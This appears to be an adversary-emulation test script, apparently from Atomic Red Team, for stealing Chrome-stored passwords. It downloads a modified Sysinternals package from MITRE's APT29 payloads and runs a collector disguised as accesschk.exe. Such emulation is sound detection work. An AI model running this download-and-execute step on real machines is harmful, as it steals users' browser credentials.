#TechniqueName: Credentials from Password Stores: Credentials from Web Browsers
#AtomicTestName: Run Chrome-password Collector
#Language: ps1

#get_prereq_commands
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://github.com/mitre-attack/attack-arsenal/raw/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/Modified-SysInternalsSuite.zip" -OutFile "$env:TEMP\Modified-SysInternalsSuite.zip"
Expand-Archive $env:TEMP\Modified-SysInternalsSuite.zip $env:TEMP\sysinternals -Force
Remove-Item $env:TEMP\Modified-SysInternalsSuite.zip -Force


#prereq_commands
if (Test-Path $env:TEMP\SysInternals) {exit 0} else {exit 1}


#commands
Set-Location -path "$env:TEMP\Sysinternals";
./accesschk.exe -accepteula .;


#cleanup_commands
Remove-Item $env:TEMP\Sysinternals -Force -Recurse -ErrorAction Ignore
